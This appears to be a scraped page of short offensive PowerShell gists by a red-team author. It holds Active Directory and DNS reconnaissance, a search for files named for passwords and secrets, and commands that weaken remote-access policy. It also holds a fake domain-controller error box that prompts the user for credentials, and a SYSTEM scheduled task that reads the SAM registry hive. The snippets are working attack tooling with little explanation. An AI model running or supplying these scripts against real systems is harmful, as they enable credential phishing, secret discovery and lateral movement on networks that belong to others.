This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Rotate-Byte { | |
<# | |
.SYNOPSIS | |
Performs left/right binary rotation on individual bytes. | |
Author: @harmj0y | |
.DESCRIPTION | |
Implements the logic to perform per-byte binary rotates right and left. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$Results = ([adsisearcher]"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))").FindAll() | % { | |
$Entry = $_.GetDirectoryEntry() | |
$SAM = $Entry.samAccountName[0] | |
$DN = $Entry.distinguishedName[0] | |
try { | |
$Cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 @($Entry.userCertificate) | |
$Exp = $Cert.GetExpirationDateString() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Get all zones: | |
Get-WmiObject MicrosoftDNS_Zone -Namespace Root\MicrosoftDNS -ComputerName primary.testlab.local | Select ContainerName | |
Get all A records from a zone: | |
Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT * FROM MicrosoftDNS_ResourceRecord WHERE ContainerName='testlab.local'" -ComputerName primary.testlab.local | ?{$_.TextRepresentation -match " A "} | Select -Expand TextRepresentation | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# all files in sortable csv | |
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue | where {!$_.PSIsContainer} | select-object FullName, @{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}}, LastAccessTime, LastWriteTime, Length | export-csv -notypeinformation -path files.csv" | |
# grep for specific file types | |
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*.doc*','*.xls*','*.pdf')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv" | |
# grep for specific key words in file names | |
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*password*','*sensitive*','*secret*')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Run winrm quickconfig defaults | |
echo Y | winrm quickconfig | |
#Run enable psremoting command with defaults | |
Enable-PSRemoting -force | |
# adjust local token filter policy | |
Set-ItemProperty –Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System –Name LocalAccountTokenFilterPolicy –Value 1 -Type DWord | |
#Enabled Trusted Hosts for Universial Access |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-LockWorkStation { | |
# region define P/Invoke types dynamically | |
# stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1 | |
# thanks matt and chris :) | |
$DynAssembly = New-Object System.Reflection.AssemblyName('Win32') | |
$AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
$ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False) | |
$TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class') | |
$DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String])) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Stolen/adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/ | |
# POC from greg.foss[at]owasp.org | |
function prompt { | |
Add-Type -AssemblyName Microsoft.VisualBasic | |
[Microsoft.VisualBasic.Interaction]::MsgBox('Lost contact with the Domain Controller.', 'OKOnly,MsgBoxSetForeground,SystemModal,Critical', 'ERROR - 0xA801B720') | |
$c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name | |
$credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$megs=1000;$w=New-Object IO.streamWriter $env:temp\data.dat;[char[]]$c='azertyuiopqsdfghjklmwxcvbnAZERTYUIOPQSDFGHJKLMWXCVBN0123456789-_';1..$megs|ForEach-Object{1..4|ForEach-Object{$r=$c|Get-Random -Count $c.Count;$s=-join $r;$w.Write($s*4kb);}}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
schtasks /create /tn GetSid /tr "powershell.exe -c '$k=Get-Item HKLM:\security\sam\domains\account;$v=Get-ItemProperty $k.pspath;New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$v.V[-24..-1],0)|Format-List *|Out-File c:\sid.txt'" /sc minute /ru System /MO 1 & choice /C X /T 60 /D X > nul & schtasks /delete /tn GetSid /f |